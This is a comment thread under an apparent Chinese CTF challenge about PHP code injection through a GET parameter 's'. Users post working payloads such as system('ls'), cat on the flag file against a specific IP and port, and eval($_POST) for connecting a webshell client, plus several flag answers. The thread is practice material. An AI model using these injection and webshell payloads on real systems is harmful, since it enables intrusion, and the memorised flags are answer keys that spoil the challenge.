s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容
http://114.67.175.224:16478/?s=system(%27ls%27) http://114.67.175.224:16478/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)
http://114.67.175.224:16478/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)
?s=eval+($_POST['123'])
答案就在描述里,上传的s参数如果是字符串会被当命令执行
flag{0aa5253236aa8d97368bd753cb3c4cf2}
flag{f790b1679ece8cfe8ce3fc425c30896b}
?s=eval($_POST["cmd"]),再用蚁剑连
?s=eval($_POST["cmd"])
flag{11393cf7e26fe81d89dc60b63d3a1f52}
...
评论
freestyle 19天前
举报
s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容
我是CTF大王 21天前
举报
http://114.67.175.224:16478/?s=system(%27ls%27) http://114.67.175.224:16478/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)
我是CTF大王 21天前
举报
http://114.67.175.224:16478/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)
000ooo 25天前
举报
?s=eval+($_POST['123'])
ruien 1月前
举报
答案就在描述里,上传的s参数如果是字符串会被当命令执行
112356 1月前
举报
flag{0aa5253236aa8d97368bd753cb3c4cf2}
迷茫的三千面 1月前
举报
flag{f790b1679ece8cfe8ce3fc425c30896b}
星空 1月前
举报
?s=eval($_POST["cmd"]),再用蚁剑连
星空 1月前
举报
?s=eval($_POST["cmd"])
15824777912 2月前
举报
flag{11393cf7e26fe81d89dc60b63d3a1f52}